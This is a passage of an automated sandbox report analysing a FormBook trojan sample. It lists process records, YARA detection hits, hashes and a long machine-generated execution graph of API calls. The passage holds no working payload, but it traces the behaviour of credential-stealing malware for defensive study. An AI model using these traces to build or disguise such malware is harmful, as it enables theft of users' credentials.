                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.3527070490.00000000031F0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3527139921.0000000003240000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.3527139921.0000000003240000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                          Reputation:moderate
                                                          Has exited:false

                                                          Target ID:7
                                                          Start time:09:42:14
                                                          Start date:05/11/2024
                                                          Path:C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:"C:\Program Files (x86)\jTywsSyZXpXDNFBvymQvMIBsvSAyXAqCpdLpiqTamkLbwBTnH\SwTeWVAxKdsP.exe"
                                                          Imagebase:0x4b0000
                                                          File size:140'800 bytes
                                                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3528921594.0000000004BF0000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.3528921594.0000000004BF0000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                                                          Reputation:high
                                                          Has exited:false

                                                          Target ID:8
                                                          Start time:09:42:26
                                                          Start date:05/11/2024
                                                          Path:C:\Program Files\Mozilla Firefox\firefox.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                                                          Imagebase:0x7ff6bf500000
                                                          File size:676'768 bytes
                                                          MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                                                          Has elevated privileges:false
                                                          Has administrator privileges:false
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high
                                                          Has exited:true


                                                            Execution Graph

                                                            Execution Coverage:3.5%
                                                            Dynamic/Decrypted Code Coverage:0.4%
                                                            Signature Coverage:8.7%
                                                            Total number of Nodes:2000
                                                            Total number of Limit Nodes:37
                                                            execution_graph (rendered call graph; the node and edge listing does not survive as readable text)
84539 417d91 84628 4178ff 49 API calls _free 84539->84628 84541 417d2a 84541->84539 84621 416b49 84541->84621 84544 417d76 84627 41793c 46 API calls 4 library calls 84544->84627 84546 417d7e GetCurrentThreadId 84546->84536 84548 416b49 __calloc_crt 46 API calls 84547->84548 84554 41aabf 84548->84554 84549 41ac6a GetStdHandle 84555 41ac34 84549->84555 84550 41acce SetHandleCount 84559 4164f7 84550->84559 84551 416b49 __calloc_crt 46 API calls 84551->84554 84552 41ac7c GetFileType 84552->84555 84553 41abb4 84553->84555 84556 41abe0 GetFileType 84553->84556 84557 41abeb InitializeCriticalSectionAndSpinCount 84553->84557 84554->84551 84554->84553 84554->84555 84554->84559 84555->84549 84555->84550 84555->84552 84558 41aca2 InitializeCriticalSectionAndSpinCount 84555->84558 84556->84553 84556->84557 84557->84553 84557->84559 84558->84555 84558->84559 84559->84503 84613 411924 46 API calls 3 library calls 84559->84613 84561 41f595 84560->84561 84562 41f599 84560->84562 84561->84507 84562->84562 84638 416b04 84562->84638 84564 41f5bb _memmove 84565 41f5c2 FreeEnvironmentStringsW 84564->84565 84565->84507 84568 41f50b _wparse_cmdline 84566->84568 84567 41f54e _wparse_cmdline 84567->84509 84568->84567 84569 416b04 __malloc_crt 46 API calls 84568->84569 84569->84567 84571 41f2bc _wcslen 84570->84571 84575 41f2b4 84570->84575 84572 416b49 __calloc_crt 46 API calls 84571->84572 84577 41f2e0 _wcslen 84572->84577 84573 41f336 84645 413748 84573->84645 84575->84513 84576 416b49 __calloc_crt 46 API calls 84576->84577 84577->84573 84577->84575 84577->84576 84578 41f35c 84577->84578 84581 41f373 84577->84581 84644 41ef12 46 API calls __tsopen_nolock 84577->84644 84579 413748 _free 46 API calls 84578->84579 84579->84575 84651 417ed3 84581->84651 84583 41f37f 84583->84513 84585 411711 __initterm_e __initp_misc_cfltcvt_tab __IsNonwritableInCurrentImage 84584->84585 84587 411750 __IsNonwritableInCurrentImage 84585->84587 84670 41130a 51 API calls __cinit 84585->84670 84587->84517 84589 
42e2f3 84588->84589 84590 40d6cc 84588->84590 84671 408f40 84590->84671 84592 40d707 84675 40ebb0 84592->84675 84595 40d737 84678 411951 84595->84678 84600 40d751 84690 40f4e0 SystemParametersInfoW SystemParametersInfoW 84600->84690 84602 40d75f 84691 40d590 GetCurrentDirectoryW 84602->84691 84604 40d767 SystemParametersInfoW 84605 40d794 84604->84605 84606 40d78d FreeLibrary 84604->84606 84607 408f40 VariantClear 84605->84607 84606->84605 84608 40d79d 84607->84608 84609 408f40 VariantClear 84608->84609 84610 40d7a6 84609->84610 84610->84522 84617 4118da 46 API calls _doexit 84610->84617 84611->84495 84612->84499 84617->84522 84618->84525 84619->84533 84620->84541 84623 416b52 84621->84623 84624 416b8f 84623->84624 84625 416b70 Sleep 84623->84625 84629 41f677 84623->84629 84624->84539 84624->84544 84626 416b85 84625->84626 84626->84623 84626->84624 84627->84546 84628->84536 84630 41f683 84629->84630 84631 41f69e _malloc 84629->84631 84630->84631 84632 41f68f 84630->84632 84634 41f6b1 HeapAlloc 84631->84634 84636 41f6d8 84631->84636 84637 417f77 46 API calls __getptd_noexit 84632->84637 84634->84631 84634->84636 84635 41f694 84635->84623 84636->84623 84637->84635 84641 416b0d 84638->84641 84639 4135bb _malloc 45 API calls 84639->84641 84640 416b43 84640->84564 84641->84639 84641->84640 84642 416b24 Sleep 84641->84642 84643 416b39 84642->84643 84643->84640 84643->84641 84644->84577 84646 41377c __dosmaperr 84645->84646 84647 413753 RtlFreeHeap 84645->84647 84646->84575 84647->84646 84648 413768 84647->84648 84654 417f77 46 API calls __getptd_noexit 84648->84654 84650 41376e GetLastError 84650->84646 84655 417daa 84651->84655 84654->84650 84656 417dc9 __cftoa_l __call_reportfault 84655->84656 84657 417de7 IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter 84656->84657 84660 417eb5 __call_reportfault 84657->84660 84659 417ed1 GetCurrentProcess TerminateProcess 84659->84583 84661 41a208 84660->84661 84662 41a210 84661->84662 84663 41a212 
IsDebuggerPresent 84661->84663 84662->84659 84669 41fe19 84663->84669 84666 421fd3 SetUnhandledExceptionFilter UnhandledExceptionFilter 84667 421ff0 __call_reportfault 84666->84667 84668 421ff8 GetCurrentProcess TerminateProcess 84666->84668 84667->84668 84668->84659 84669->84666 84670->84587 84673 408f48 ctype 84671->84673 84672 4265c7 VariantClear 84674 408f55 ctype 84672->84674 84673->84672 84673->84674 84674->84592 84731 40ebd0 84675->84731 84735 4182cb 84678->84735 84680 41195e 84742 4181f2 LeaveCriticalSection 84680->84742 84682 40d748 84683 4119b0 84682->84683 84684 4119d6 84683->84684 84685 4119bc 84683->84685 84684->84600 84685->84684 84777 417f77 46 API calls __getptd_noexit 84685->84777 84687 4119c6 84778 417f25 10 API calls __tsopen_nolock 84687->84778 84689 4119d1 84689->84600 84690->84602 84779 401f20 84691->84779 84693 40d5b6 IsDebuggerPresent 84694 40d5c4 84693->84694 84695 42e1bb MessageBoxA 84693->84695 84696 42e1d4 84694->84696 84697 40d5e3 84694->84697 84695->84696 84951 403a50 52 API calls 3 library calls 84696->84951 84849 40f520 84697->84849 84701 40d5fd GetFullPathNameW 84861 401460 84701->84861 84703 40d63b 84704 40d643 84703->84704 84705 42e231 SetCurrentDirectoryW 84703->84705 84706 40d64c 84704->84706 84952 432fee 6 API calls 84704->84952 84705->84704 84876 410390 GetSysColorBrush LoadCursorW LoadIconW LoadIconW LoadIconW 84706->84876 84709 42e252 84709->84706 84711 42e25a GetModuleFileNameW 84709->84711 84713 42e274 84711->84713 84714 42e2cb GetForegroundWindow ShellExecuteW 84711->84714 84953 401b10 84713->84953 84716 40d688 84714->84716 84715 40d656 84718 40d669 84715->84718 84719 40e0c0 74 API calls 84715->84719 84723 40d692 SetCurrentDirectoryW 84716->84723 84884 4091e0 84718->84884 84719->84718 84723->84604 84725 42e28d 84960 40d200 52 API calls 2 library calls 84725->84960 84728 42e299 GetForegroundWindow ShellExecuteW 84729 42e2c6 84728->84729 84729->84716 84730 40ec00 LoadLibraryA GetProcAddress 84730->84595 84732 40d72e 
84731->84732 84733 40ebd6 LoadLibraryA 84731->84733 84732->84595 84732->84730 84733->84732 84734 40ebe7 GetProcAddress 84733->84734 84734->84732 84736 4182e0 84735->84736 84737 4182f3 EnterCriticalSection 84735->84737 84743 418209 84736->84743 84737->84680 84739 4182e6 84739->84737 84770 411924 46 API calls 3 library calls 84739->84770 84742->84682 84744 418215 __tsopen_nolock 84743->84744 84745 418225 84744->84745 84746 41823d 84744->84746 84771 418901 46 API calls __NMSG_WRITE 84745->84771 84748 416b04 __malloc_crt 45 API calls 84746->84748 84755 41824b __tsopen_nolock 84746->84755 84750 418256 84748->84750 84749 41822a 84772 418752 46 API calls 6 library calls 84749->84772 84753 41825d 84750->84753 84754 41826c 84750->84754 84752 418231 84773 411682 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 84752->84773 84774 417f77 46 API calls __getptd_noexit 84753->84774 84758 4182cb __lock 45 API calls 84754->84758 84755->84739 84760 418273 84758->84760 84761 4182a6 84760->84761 84762 41827b InitializeCriticalSectionAndSpinCount 84760->84762 84763 413748 _free 45 API calls 84761->84763 84764 418297 84762->84764 84765 41828b 84762->84765 84763->84764 84776 4182c2 LeaveCriticalSection _doexit 84764->84776 84766 413748 _free 45 API calls 84765->84766 84767 418291 84766->84767 84775 417f77 46 API calls __getptd_noexit 84767->84775 84771->84749 84772->84752 84774->84755 84775->84764 84776->84755 84777->84687 84778->84689 84961 40e6e0 84779->84961 84783 401f41 GetModuleFileNameW 84979 410100 84783->84979 84785 401f5c 84991 410960 84785->84991 84788 401b10 52 API calls 84789 401f81 84788->84789 84994 401980 84789->84994 84791 401f8e 84792 408f40 VariantClear 84791->84792 84793 401f9d 84792->84793 84794 401b10 52 API calls 84793->84794 84795 401fb4 84794->84795 84796 401980 53 API calls 84795->84796 84797 401fc3 84796->84797 84798 401b10 52 API calls 84797->84798 84799 401fd2 84798->84799 85002 40c2c0 84799->85002 84801 401fe1 84802 40bc70 52 API calls 
84801->84802 84803 401ff3 84802->84803 85020 401a10 84803->85020 84805 401ffe 85027 4114ab 84805->85027 84808 428b05 84810 401a10 52 API calls 84808->84810 84809 402017 84811 4114ab __wcsicoll 58 API calls 84809->84811 84812 428b18 84810->84812 84813 402022 84811->84813 84815 401a10 52 API calls 84812->84815 84813->84812 84814 40202d 84813->84814 84816 4114ab __wcsicoll 58 API calls 84814->84816 84817 428b33 84815->84817 84818 402038 84816->84818 84820 428b3b GetModuleFileNameW 84817->84820 84819 402043 84818->84819 84818->84820 84821 4114ab __wcsicoll 58 API calls 84819->84821 84822 401a10 52 API calls 84820->84822 84823 40204e 84821->84823 84824 428b6c 84822->84824 84829 401a10 52 API calls 84823->84829 84831 428b90 _wcscpy 84823->84831 84840 402092 84823->84840 84825 40e0a0 52 API calls 84824->84825 84827 428b7a 84825->84827 84826 4020a3 84828 428bc6 84826->84828 85035 40e830 53 API calls 84826->85035 84830 401a10 52 API calls 84827->84830 84836 402073 _wcscpy 84829->84836 84833 428b88 84830->84833 84834 401a10 52 API calls 84831->84834 84833->84831 84844 4020d0 84834->84844 84835 4020bb 85036 40cf00 53 API calls 84835->85036 84838 401a10 52 API calls 84836->84838 84838->84840 84839 4020c6 84841 408f40 VariantClear 84839->84841 84840->84826 84840->84831 84841->84844 84842 402110 84846 408f40 VariantClear 84842->84846 84844->84842 84847 401a10 52 API calls 84844->84847 85037 40cf00 53 API calls 84844->85037 85038 40e6a0 53 API calls 84844->85038 84848 402120 ctype 84846->84848 84847->84844 84848->84693 84850 4295c9 __cftoa_l 84849->84850 84851 40f53c 84849->84851 84853 4295d9 GetOpenFileNameW 84850->84853 85714 410120 84851->85714 84853->84851 84855 40d5f5 84853->84855 84854 40f545 85718 4102b0 SHGetMalloc 84854->85718 84855->84701 84855->84703 84857 40f54c 85723 410190 GetFullPathNameW 84857->85723 84859 40f559 85734 40f570 84859->85734 85796 402400 84861->85796 84863 40146f 84864 428c29 _wcscat 84863->84864 85805 401500 84863->85805 84866 40147c 84866->84864 
85813 40d440 84866->85813 84868 401489 84868->84864 84869 401491 GetFullPathNameW 84868->84869 84870 402160 52 API calls 84869->84870 84871 4014bb 84870->84871 84872 402160 52 API calls 84871->84872 84873 4014c8 84872->84873 84873->84864 84874 402160 52 API calls 84873->84874 84875 4014ee 84874->84875 84875->84703 84877 428361 84876->84877 84878 4103fc LoadImageW RegisterClassExW 84876->84878 85883 44395e EnumResourceNamesW LoadImageW 84877->85883 85882 410490 7 API calls 84878->85882 84881 40d651 84883 410570 CreateWindowExW CreateWindowExW ShowWindow ShowWindow 84881->84883 84882 428368 84883->84715 84885 409202 84884->84885 84886 42d7ad 84884->84886 84943 409216 ctype 84885->84943 86146 410940 338 API calls 84885->86146 86149 45e737 90 API calls 3 library calls 84886->86149 84889 40939c 84889->84716 84950 401000 Shell_NotifyIconW __cftoa_l 84889->84950 84891 4095b2 84891->84889 84893 4095bf 84891->84893 84892 409253 PeekMessageW 84892->84943 86148 401a50 338 API calls 84893->86148 84895 40d410 VariantClear 84895->84943 84896 42d8cd Sleep 84896->84943 84897 4095c6 LockWindowUpdate DestroyWindow GetMessageW 84897->84889 84900 4095f9 84897->84900 84899 42e13b 86167 40d410 VariantClear 84899->86167 84902 42e158 TranslateMessage DispatchMessageW GetMessageW 84900->84902 84902->84902 84906 42e188 84902->84906 84904 409567 PeekMessageW 84904->84943 84905 409386 84905->84889 86147 40f190 10 API calls 84905->86147 84906->84889 84909 44c29d 52 API calls 84949 4094e0 84909->84949 84910 46fdbf 108 API calls 84910->84949 84911 46f3c1 107 API calls 84911->84943 84912 40e0a0 52 API calls 84912->84943 84913 409551 TranslateMessage DispatchMessageW 84913->84904 84915 42dcd2 WaitForSingleObject 84916 42dcf0 GetExitCodeProcess CloseHandle 84915->84916 84915->84943 86156 40d410 VariantClear 84916->86156 84918 42dd3d Sleep 84918->84949 84921 4094cf Sleep 84921->84949 84923 42d94d timeGetTime 86152 465124 53 API calls 84923->86152 84925 40c620 timeGetTime 84925->84949 84928 42dd89 
CloseHandle 84928->84949 84929 47d33e 316 API calls 84929->84943 84931 408f40 VariantClear 84931->84949 84932 465124 53 API calls 84932->84949 84933 42de19 GetExitCodeProcess CloseHandle 84933->84949 84935 401b10 52 API calls 84935->84949 84937 42de88 Sleep 84937->84943 84942 42e0cc VariantClear 84942->84943 84943->84892 84943->84895 84943->84896 84943->84899 84943->84904 84943->84905 84943->84911 84943->84912 84943->84913 84943->84915 84943->84918 84943->84921 84943->84923 84943->84929 84943->84942 84944 45e737 90 API calls 84943->84944 84945 408f40 VariantClear 84943->84945 84943->84949 85884 4091b0 84943->85884 85942 40afa0 84943->85942 85968 408fc0 84943->85968 86003 408cc0 84943->86003 86017 4096a0 84943->86017 86144 40d150 TranslateAcceleratorW 84943->86144 86145 40d170 IsDialogMessageW GetClassLongW 84943->86145 86150 465124 53 API calls 84943->86150 86151 40c620 timeGetTime 84943->86151 86166 40e270 VariantClear ctype 84943->86166 84944->84943 84945->84943 84947 401980 53 API calls 84947->84949 84949->84909 84949->84910 84949->84925 84949->84928 84949->84931 84949->84932 84949->84933 84949->84935 84949->84937 84949->84943 84949->84947 86153 45178a 54 API calls 84949->86153 86154 47d33e 338 API calls 84949->86154 86155 453bc6 54 API calls 84949->86155 86157 40d410 VariantClear 84949->86157 86158 443d19 67 API calls _wcslen 84949->86158 86159 4574b4 VariantClear 84949->86159 86160 403cd0 84949->86160 86164 4731e1 VariantClear 84949->86164 86165 4331a2 6 API calls 84949->86165 84950->84716 84951->84703 84952->84709 84954 401b16 _wcslen 84953->84954 84955 4115d7 52 API calls 84954->84955 84957 401b63 84954->84957 84956 401b4b _memmove 84955->84956 84958 4115d7 52 API calls 84956->84958 84959 40d200 52 API calls 2 library calls 84957->84959 84958->84957 84959->84725 84960->84728 84962 40bc70 52 API calls 84961->84962 84963 401f31 84962->84963 84964 402560 84963->84964 84965 40256d __write_nolock 84964->84965 84966 402160 52 API calls 84965->84966 84967 402593 
84966->84967 84977 4025bd 84967->84977 85039 401c90 84967->85039 84969 4026f0 52 API calls 84969->84977 84970 4026a7 84971 401b10 52 API calls 84970->84971 84975 4026db 84970->84975 84973 4026d1 84971->84973 84972 401b10 52 API calls 84972->84977 85043 40d7c0 52 API calls 2 library calls 84973->85043 84975->84783 84977->84969 84977->84970 84977->84972 84978 401c90 52 API calls 84977->84978 85042 40d7c0 52 API calls 2 library calls 84977->85042 84978->84977 85044 40f760 84979->85044 84982 410118 84982->84785 84984 42805d 84985 42806a 84984->84985 85100 431e58 84984->85100 84986 413748 _free 46 API calls 84985->84986 84988 428078 84986->84988 84989 431e58 82 API calls 84988->84989 84990 428084 84989->84990 84990->84785 84992 4115d7 52 API calls 84991->84992 84993 401f74 84992->84993 84993->84788 84995 4019a3 84994->84995 85000 401985 84994->85000 84996 4019b8 84995->84996 84995->85000 85703 403e10 53 API calls 84996->85703 84998 40199f 84998->84791 84999 4019c4 84999->84791 85000->84998 85702 403e10 53 API calls 85000->85702 85003 40c2c7 85002->85003 85004 40c30e 85002->85004 85007 40c2d3 85003->85007 85008 426c79 85003->85008 85005 40c315 85004->85005 85006 426c2b 85004->85006 85009 40c321 85005->85009 85010 426c5a 85005->85010 85012 426c4b 85006->85012 85013 426c2e 85006->85013 85704 403ea0 52 API calls __cinit 85007->85704 85709 4534e3 52 API calls 85008->85709 85705 403ea0 52 API calls __cinit 85009->85705 85708 4534e3 52 API calls 85010->85708 85707 4534e3 52 API calls 85012->85707 85019 40c2de 85013->85019 85706 4534e3 52 API calls 85013->85706 85019->84801 85019->85019 85021 401a30 85020->85021 85022 401a17 85020->85022 85024 402160 52 API calls 85021->85024 85023 401a2d 85022->85023 85710 403c30 52 API calls _memmove 85022->85710 85023->84805 85026 401a3d 85024->85026 85026->84805 85028 411523 85027->85028 85029 4114ba 85027->85029 85713 4113a8 58 API calls 3 library calls 85028->85713 85034 40200c 85029->85034 85711 417f77 46 API calls __getptd_noexit 
85029->85711 85032 4114c6 85712 417f25 10 API calls __tsopen_nolock 85032->85712 85034->84808 85034->84809 85035->84835 85036->84839 85037->84844 85038->84844 85040 4026f0 52 API calls 85039->85040 85041 401c97 85040->85041 85041->84967 85042->84977 85043->84975 85104 40f6f0 85044->85104 85046 40f77b _strcat ctype 85112 40f850 85046->85112 85051 427c2a 85141 414d04 85051->85141 85053 40f7fc 85053->85051 85054 40f804 85053->85054 85128 414a46 85054->85128 85058 40f80e 85058->84982 85063 4528bd 85058->85063 85060 427c59 85147 414fe2 85060->85147 85062 427c79 85064 4150d1 _fseek 81 API calls 85063->85064 85065 452930 85064->85065 85644 452719 85065->85644 85068 452948 85068->84984 85069 414d04 __fread_nolock 61 API calls 85070 452966 85069->85070 85071 414d04 __fread_nolock 61 API calls 85070->85071 85072 452976 85071->85072 85073 414d04 __fread_nolock 61 API calls 85072->85073 85074 45298f 85073->85074 85075 414d04 __fread_nolock 61 API calls 85074->85075 85076 4529aa 85075->85076 85077 4150d1 _fseek 81 API calls 85076->85077 85078 4529c4 85077->85078 85079 4135bb _malloc 46 API calls 85078->85079 85080 4529cf 85079->85080 85081 4135bb _malloc 46 API calls 85080->85081 85082 4529db 85081->85082 85083 414d04 __fread_nolock 61 API calls 85082->85083 85084 4529ec 85083->85084 85085 44afef GetSystemTimeAsFileTime 85084->85085 85086 452a00 85085->85086 85087 452a36 85086->85087 85088 452a13 85086->85088 85090 452aa5 85087->85090 85091 452a3c 85087->85091 85089 413748 _free 46 API calls 85088->85089 85093 452a1c 85089->85093 85092 413748 _free 46 API calls 85090->85092 85650 44b1a9 85091->85650 85095 452aa3 85092->85095 85096 413748 _free 46 API calls 85093->85096 85095->84984 85098 452a25 85096->85098 85097 452a9d 85099 413748 _free 46 API calls 85097->85099 85098->84984 85099->85095 85101 431e64 85100->85101 85102 431e6a 85100->85102 85103 414a46 __fcloseall 82 API calls 85101->85103 85102->84985 85103->85102 85105 425de2 85104->85105 85106 40f6fc _wcslen 85104->85106 
85105->85046 85107 40f710 WideCharToMultiByte 85106->85107 85108 40f756 85107->85108 85109 40f728 85107->85109 85108->85046 85110 4115d7 52 API calls 85109->85110 85111 40f735 WideCharToMultiByte 85110->85111 85111->85046 85114 40f85d __cftoa_l _strlen 85112->85114 85115 40f7ab 85114->85115 85160 414db8 85114->85160 85116 4149c2 85115->85116 85172 414904 85116->85172 85118 40f7e9 85118->85051 85119 40f5c0 85118->85119 85120 40f5cd _strcat __write_nolock _memmove 85119->85120 85121 414d04 __fread_nolock 61 API calls 85120->85121 85122 40f691 __tzset_nolock 85120->85122 85124 425d11 85120->85124 85260 4150d1 85120->85260 85121->85120 85122->85053 85125 4150d1 _fseek 81 API calls 85124->85125 85126 425d33 85125->85126 85127 414d04 __fread_nolock 61 API calls 85126->85127 85127->85122 85129 414a52 __tsopen_nolock 85128->85129 85130 414a64 85129->85130 85131 414a79 85129->85131 85400 417f77 46 API calls __getptd_noexit 85130->85400 85133 415471 __lock_file 47 API calls 85131->85133 85137 414a74 __tsopen_nolock 85131->85137 85135 414a92 85133->85135 85134 414a69 85401 417f25 10 API calls __tsopen_nolock 85134->85401 85384 4149d9 85135->85384 85137->85058 85469 414c76 85141->85469 85143 414d1c 85144 44afef 85143->85144 85637 442c5a 85144->85637 85146 44b00d 85146->85060 85148 414fee __tsopen_nolock 85147->85148 85149 414ffa 85148->85149 85150 41500f 85148->85150 85641 417f77 46 API calls __getptd_noexit 85149->85641 85151 415471 __lock_file 47 API calls 85150->85151 85154 415017 85151->85154 85153 414fff 85642 417f25 10 API calls __tsopen_nolock 85153->85642 85156 414e4e __ftell_nolock 51 API calls 85154->85156 85157 415024 85156->85157 85643 41503d LeaveCriticalSection LeaveCriticalSection _fseek 85157->85643 85159 41500a __tsopen_nolock 85159->85062 85161 414dd6 85160->85161 85162 414deb 85160->85162 85169 417f77 46 API calls __getptd_noexit 85161->85169 85162->85161 85167 414df2 85162->85167 85164 414ddb 85170 417f25 10 API calls __tsopen_nolock 85164->85170 85166 
414de6 85166->85114 85167->85166 85171 418f98 77 API calls 6 library calls 85167->85171 85169->85164 85170->85166 85171->85166 85174 414910 __tsopen_nolock 85172->85174 85173 414923 85228 417f77 46 API calls __getptd_noexit 85173->85228 85174->85173 85176 414951 85174->85176 85191 41d4d1 85176->85191 85177 414928 85229 417f25 10 API calls __tsopen_nolock 85177->85229 85180 414956 85181 41496a 85180->85181 85182 41495d 85180->85182 85184 414992 85181->85184 85185 414972 85181->85185 85230 417f77 46 API calls __getptd_noexit 85182->85230 85208 41d218 85184->85208 85231 417f77 46 API calls __getptd_noexit 85185->85231 85190 414933 __tsopen_nolock @_EH4_CallFilterFunc@8 85190->85118 85192 41d4dd __tsopen_nolock 85191->85192 85193 4182cb __lock 46 API calls 85192->85193 85194 41d4eb 85193->85194 85195 41d567 85194->85195 85202 418209 __mtinitlocknum 46 API calls 85194->85202 85206 41d560 85194->85206 85236 4154b2 47 API calls __lock 85194->85236 85237 415520 LeaveCriticalSection LeaveCriticalSection _doexit 85194->85237 85196 416b04 __malloc_crt 46 API calls 85195->85196 85198 41d56e 85196->85198 85199 41d57c InitializeCriticalSectionAndSpinCount 85198->85199 85198->85206 85200 41d59c 85199->85200 85201 41d5af EnterCriticalSection 85199->85201 85205 413748 _free 46 API calls 85200->85205 85201->85206 85202->85194 85204 41d5f0 __tsopen_nolock 85204->85180 85205->85206 85233 41d5fb 85206->85233 85209 41d23a 85208->85209 85210 41d255 85209->85210 85222 41d26c __wopenfile 85209->85222 85242 417f77 46 API calls __getptd_noexit 85210->85242 85212 41d421 85215 41d47a 85212->85215 85216 41d48c 85212->85216 85213 41d25a 85243 417f25 10 API calls __tsopen_nolock 85213->85243 85247 417f77 46 API calls __getptd_noexit 85215->85247 85239 422bf9 85216->85239 85219 41d47f 85248 417f25 10 API calls __tsopen_nolock 85219->85248 85220 41499d 85232 4149b8 LeaveCriticalSection LeaveCriticalSection _fseek 85220->85232 85222->85212 85222->85215 85244 41341f 58 API calls 2 library calls 
85222->85244 85224 41d41a 85224->85212 85245 41341f 58 API calls 2 library calls 85224->85245 85226 41d439 85226->85212 85246 41341f 58 API calls 2 library calls 85226->85246 85228->85177 85229->85190 85230->85190 85231->85190 85232->85190 85238 4181f2 LeaveCriticalSection 85233->85238 85235 41d602 85235->85204 85236->85194 85237->85194 85238->85235 85249 422b35 85239->85249 85241 422c14 85241->85220 85242->85213 85243->85220 85244->85224 85245->85226 85246->85212 85247->85219 85248->85220 85251 422b41 __tsopen_nolock 85249->85251 85250 422b54 85252 417f77 __tsopen_nolock 46 API calls 85250->85252 85251->85250 85253 422b8a 85251->85253 85254 422b59 85252->85254 85255 422400 __tsopen_nolock 109 API calls 85253->85255 85256 417f25 __tsopen_nolock 10 API calls 85254->85256 85257 422ba4 85255->85257 85259 422b63 __tsopen_nolock 85256->85259 85258 422bcb __wsopen_helper LeaveCriticalSection 85257->85258 85258->85259 85259->85241 85263 4150dd __tsopen_nolock 85260->85263 85261 4150e9 85291 417f77 46 API calls __getptd_noexit 85261->85291 85263->85261 85264 41510f 85263->85264 85273 415471 85264->85273 85265 4150ee 85292 417f25 10 API calls __tsopen_nolock 85265->85292 85272 4150f9 __tsopen_nolock 85272->85120 85274 415483 85273->85274 85275 4154a5 EnterCriticalSection 85273->85275 85274->85275 85276 41548b 85274->85276 85277 415117 85275->85277 85278 4182cb __lock 46 API calls 85276->85278 85279 415047 85277->85279 85278->85277 85280 415067 85279->85280 85281 415057 85279->85281 85286 415079 85280->85286 85294 414e4e 85280->85294 85349 417f77 46 API calls __getptd_noexit 85281->85349 85285 41505c 85293 415143 LeaveCriticalSection LeaveCriticalSection _fseek 85285->85293 85311 41443c 85286->85311 85289 4150b9 85324 41e1f4 85289->85324 85291->85265 85292->85272 85293->85272 85295 414e61 85294->85295 85296 414e79 85294->85296 85350 417f77 46 API calls __getptd_noexit 85295->85350 85298 414139 __fflush_nolock 46 API calls 85296->85298 85300 414e80 85298->85300 85299 414e66 
85351 417f25 10 API calls __tsopen_nolock 85299->85351 85302 41e1f4 __write 51 API calls 85300->85302 85303 414e97 85302->85303 85304 414f09 85303->85304 85306 414ec9 85303->85306 85310 414e71 85303->85310 85352 417f77 46 API calls __getptd_noexit 85304->85352 85307 41e1f4 __write 51 API calls 85306->85307 85306->85310 85308 414f64 85307->85308 85309 41e1f4 __write 51 API calls 85308->85309 85308->85310 85309->85310 85310->85286 85312 414455 85311->85312 85316 414477 85311->85316 85313 414139 __fflush_nolock 46 API calls 85312->85313 85312->85316 85314 414470 85313->85314 85353 41b7b2 77 API calls 4 library calls 85314->85353 85317 414139 85316->85317 85318 414145 85317->85318 85319 41415a 85317->85319 85354 417f77 46 API calls __getptd_noexit 85318->85354 85319->85289 85321 41414a 85355 417f25 10 API calls __tsopen_nolock 85321->85355 85323 414155 85323->85289 85325 41e200 __tsopen_nolock 85324->85325 85326 41e208 85325->85326 85330 41e223 85325->85330 85376 417f8a 46 API calls __getptd_noexit 85326->85376 85328 41e22f 85378 417f8a 46 API calls __getptd_noexit 85328->85378 85329 41e20d 85377 417f77 46 API calls __getptd_noexit 85329->85377 85330->85328 85333 41e269 85330->85333 85332 41e234 85379 417f77 46 API calls __getptd_noexit 85332->85379 85356 41ae56 85333->85356 85337 41e23c 85380 417f25 10 API calls __tsopen_nolock 85337->85380 85338 41e26f 85340 41e291 85338->85340 85341 41e27d 85338->85341 85381 417f77 46 API calls __getptd_noexit 85340->85381 85366 41e17f 85341->85366 85342 41e215 __tsopen_nolock 85342->85285 85345 41e289 85383 41e2c0 LeaveCriticalSection __unlock_fhandle 85345->85383 85346 41e296 85382 417f8a 46 API calls __getptd_noexit 85346->85382 85349->85285 85350->85299 85351->85310 85352->85310 85353->85316 85354->85321 85355->85323 85357 41ae62 __tsopen_nolock 85356->85357 85358 41aebc 85357->85358 85361 4182cb __lock 46 API calls 85357->85361 85359 41aec1 EnterCriticalSection 85358->85359 85360 41aede __tsopen_nolock 85358->85360 85359->85360 
429641 86806 44b6ab CreateThread 86796->86806 86798 42964f CloseHandle 86798->86793 86799->86764 86800->86767 86801->86769 86802->86781 86803->86783 86804->86787 86805->86796 86806->86798 86807 44b5cb 58 API calls 86806->86807 86808 425b6f 86813 40dc90 86808->86813 86812 425b7e 86814 40bc70 52 API calls 86813->86814 86815 40dd03 86814->86815 86822 40f210 86815->86822 86817 426a97 86819 40dd96 86819->86817 86820 40ddb7 86819->86820 86825 40dc00 52 API calls 2 library calls 86819->86825 86821 41130a 51 API calls __cinit 86820->86821 86821->86812 86826 40f250 RegOpenKeyExW 86822->86826 86824 40f230 86824->86819 86825->86819 86827 425e17 86826->86827 86828 40f275 RegQueryValueExW 86826->86828 86827->86824 86829 40f2c3 RegCloseKey 86828->86829 86830 40f298 86828->86830 86829->86824 86831 40f2a9 RegCloseKey 86830->86831 86832 425e1d 86830->86832 86831->86824
                                                            APIs
                                                            • _wcslen.LIBCMT ref: 004096C1
                                                              • Part of subcall function 004115D7: _malloc.LIBCMT ref: 004115F1
                                                            • _memmove.LIBCMT ref: 0040970C
